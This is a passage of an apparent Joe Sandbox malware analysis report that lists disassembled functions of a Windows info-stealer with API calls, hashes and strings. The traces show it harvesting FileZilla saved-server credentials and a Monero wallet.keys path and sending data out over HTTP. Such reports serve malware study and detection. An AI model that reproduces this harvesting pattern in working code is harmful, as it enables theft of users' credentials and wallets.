                                        • Opcode ID: 94dca90ca55d5375e6b9ea0ac72977e81f053a5582350e8feb34466df75b35a4
                                        • Instruction ID: 45d84993e93274af15ac33b0d839c924481c35190757dd428417da6b035676ae
                                        • Opcode Fuzzy Hash: 94dca90ca55d5375e6b9ea0ac72977e81f053a5582350e8feb34466df75b35a4
                                        • Instruction Fuzzy Hash: 7A515AF36082045FE3006E6DEC8477BBFD9DBD4320F19463DEA94C3744D63AA9168692
                                        Function 00556799 Relevance: .1, Instructions: 131COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction ID: 897f594f46128e436eb0dc98926c3470df639deb0822e77fb0571a0bd244de4d
                                        • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction Fuzzy Hash: C6512C62E09BD589C7058B7544502EEBFB26FE6210F1E829EC8981F383C375968DD3E5
                                        Function 00527588 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                        • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                        • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                        • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                        Function 004F9AA0 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        Function 004F03B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004F8F9B
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004EA13C
                                          • Part of subcall function 004EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004EA161
                                          • Part of subcall function 004EA110: LocalAlloc.KERNEL32(00000040,?), ref: 004EA181
                                          • Part of subcall function 004EA110: ReadFile.KERNEL32(000000FF,?,00000000,004E148F,00000000), ref: 004EA1AA
                                          • Part of subcall function 004EA110: LocalFree.KERNEL32(004E148F), ref: 004EA1E0
                                          • Part of subcall function 004EA110: CloseHandle.KERNEL32(000000FF), ref: 004EA1EA
                                          • Part of subcall function 004F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004F8FE2
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00500DBF,00500DBE,00500DBB,00500DBA), ref: 004F04C2
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F04C9
                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 004F04E5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F04F3
                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 004F052F
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F053D
                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 004F0579
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F0587
                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004F05C3
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F05D5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F0662
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F067A
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F0692
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F06AA
                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 004F06C2
                                        • lstrcat.KERNEL32(?,profile: null), ref: 004F06D1
                                        • lstrcat.KERNEL32(?,url: ), ref: 004F06E0
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F06F3
                                        • lstrcat.KERNEL32(?,00501770), ref: 004F0702
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F0715
                                        • lstrcat.KERNEL32(?,00501774), ref: 004F0724
                                        • lstrcat.KERNEL32(?,login: ), ref: 004F0733
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F0746
                                        • lstrcat.KERNEL32(?,00501780), ref: 004F0755
                                        • lstrcat.KERNEL32(?,password: ), ref: 004F0764
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F0777
                                        • lstrcat.KERNEL32(?,00501790), ref: 004F0786
                                        • lstrcat.KERNEL32(?,00501794), ref: 004F0795
                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F07EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                        • API String ID: 1942843190-555421843
                                        • Opcode ID: d6894f2f3e1ed371a52e522964d850dc142ff1828bc56a17d4fe208625147ee0
                                        • Instruction ID: 8bfc86319c0ec21e2c8b5e0e8a94b7ced80421aef072fe81db70349f7269e3c7
                                        • Opcode Fuzzy Hash: d6894f2f3e1ed371a52e522964d850dc142ff1828bc56a17d4fe208625147ee0
                                        • Instruction Fuzzy Hash: EFD120B190010CABCB04EBE5DD96EFE7739BF54304F008559F206B6195DF38AA58CB6A
                                        Function 004E59B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004E4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004E4889
                                          • Part of subcall function 004E4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 004E4899
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004E5A48
                                        • StrCmpCA.SHLWAPI(?,0145E888), ref: 004E5A63
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004E5BE3
                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0145E728,00000000,?,0145A400,00000000,?,00501B4C), ref: 004E5EC1
                                        • lstrlen.KERNEL32(00000000), ref: 004E5ED2
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004E5EE3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004E5EEA
                                        • lstrlen.KERNEL32(00000000), ref: 004E5EFF
                                        • lstrlen.KERNEL32(00000000), ref: 004E5F28
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004E5F41
                                        • lstrlen.KERNEL32(00000000,?,?), ref: 004E5F6B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004E5F7F
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004E5F9C
                                        • InternetCloseHandle.WININET(00000000), ref: 004E6000
                                        • InternetCloseHandle.WININET(00000000), ref: 004E600D
                                        • HttpOpenRequestA.WININET(00000000,0145E908,?,0145E208,00000000,00000000,00400100,00000000), ref: 004E5C48
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                        • InternetCloseHandle.WININET(00000000), ref: 004E6017
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 874700897-2180234286
                                        • Opcode ID: 5991753d041adf49b98abb0a0f58da66606bf82e5913ae5da6f304df7432e0ab
                                        • Instruction ID: 2d4a0a3920e1149c4df30c72232480f21632ca3e008b862773bc34837550b325
                                        • Opcode Fuzzy Hash: 5991753d041adf49b98abb0a0f58da66606bf82e5913ae5da6f304df7432e0ab
                                        • Instruction Fuzzy Hash: FB12EEB192011CABCB15EBA1DCA5FFE7379BF54704F00419EB20A62191DF387A58CB69
                                        Function 004ECFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004F8CF0: GetSystemTime.KERNEL32(00500E1B,0145A610,005005B6,?,?,004E13F9,?,0000001A,00500E1B,00000000,?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004F8D16
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004ED083
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004ED1C7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004ED1CE
                                        • lstrcat.KERNEL32(?,00000000), ref: 004ED308
                                        • lstrcat.KERNEL32(?,00501570), ref: 004ED317
                                        • lstrcat.KERNEL32(?,00000000), ref: 004ED32A
                                        • lstrcat.KERNEL32(?,00501574), ref: 004ED339
                                        • lstrcat.KERNEL32(?,00000000), ref: 004ED34C
                                        • lstrcat.KERNEL32(?,00501578), ref: 004ED35B
                                        • lstrcat.KERNEL32(?,00000000), ref: 004ED36E
                                        • lstrcat.KERNEL32(?,0050157C), ref: 004ED37D
                                        • lstrcat.KERNEL32(?,00000000), ref: 004ED390
                                        • lstrcat.KERNEL32(?,00501580), ref: 004ED39F
                                        • lstrcat.KERNEL32(?,00000000), ref: 004ED3B2
                                        • lstrcat.KERNEL32(?,00501584), ref: 004ED3C1
                                        • lstrcat.KERNEL32(?,00000000), ref: 004ED3D4
                                        • lstrcat.KERNEL32(?,00501588), ref: 004ED3E3
                                          • Part of subcall function 004FAB30: lstrlen.KERNEL32(004E4F55,?,?,004E4F55,00500DDF), ref: 004FAB3B
                                          • Part of subcall function 004FAB30: lstrcpy.KERNEL32(00500DDF,00000000), ref: 004FAB95
                                        • lstrlen.KERNEL32(?), ref: 004ED42A
                                        • lstrlen.KERNEL32(?), ref: 004ED439
                                          • Part of subcall function 004FAD80: StrCmpCA.SHLWAPI(00000000,00501568,004ED2A2,00501568,00000000), ref: 004FAD9F
                                        • DeleteFileA.KERNEL32(00000000), ref: 004ED4B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                        • String ID:
                                        • API String ID: 1956182324-0
                                        • Opcode ID: b48d59dfeb6bce74de17a1d13e4be09d9932043d2e5a0fc59034f7be8cc9e427
                                        • Instruction ID: 1fae1986c28a25b0f6b46fcd387a138931914140d60cdc940dc37f8be13678f9
                                        • Opcode Fuzzy Hash: b48d59dfeb6bce74de17a1d13e4be09d9932043d2e5a0fc59034f7be8cc9e427
                                        • Instruction Fuzzy Hash: B9E124B19101089BCB08EBA1DD96EFE7339BF54305F10455AF30A761A1DE397E18CB6A
                                        Function 004ECA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0145D480,00000000,?,00501544,00000000,?,?), ref: 004ECB6C
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 004ECB89
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 004ECB95
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004ECBA8
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004ECBD9
                                        • StrStrA.SHLWAPI(?,0145D4C8,00500B56), ref: 004ECBF7
                                        • StrStrA.SHLWAPI(00000000,0145D528), ref: 004ECC1E
                                        • StrStrA.SHLWAPI(?,0145DB40,00000000,?,00501550,00000000,?,00000000,00000000,?,014590E0,00000000,?,0050154C,00000000,?), ref: 004ECDA2
                                        • StrStrA.SHLWAPI(00000000,0145DC60), ref: 004ECDB9
                                          • Part of subcall function 004EC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 004EC971
                                          • Part of subcall function 004EC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004EC97C
                                        • StrStrA.SHLWAPI(?,0145DC60,00000000,?,00501554,00000000,?,00000000,01459100), ref: 004ECE5A
                                        • StrStrA.SHLWAPI(00000000,01459050), ref: 004ECE71
                                          • Part of subcall function 004EC920: lstrcat.KERNEL32(?,00500B47), ref: 004ECA43
                                          • Part of subcall function 004EC920: lstrcat.KERNEL32(?,00500B4B), ref: 004ECA57
                                          • Part of subcall function 004EC920: lstrcat.KERNEL32(?,00500B4E), ref: 004ECA78
                                        • lstrlen.KERNEL32(00000000), ref: 004ECF44
                                        • CloseHandle.KERNEL32(00000000), ref: 004ECF9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
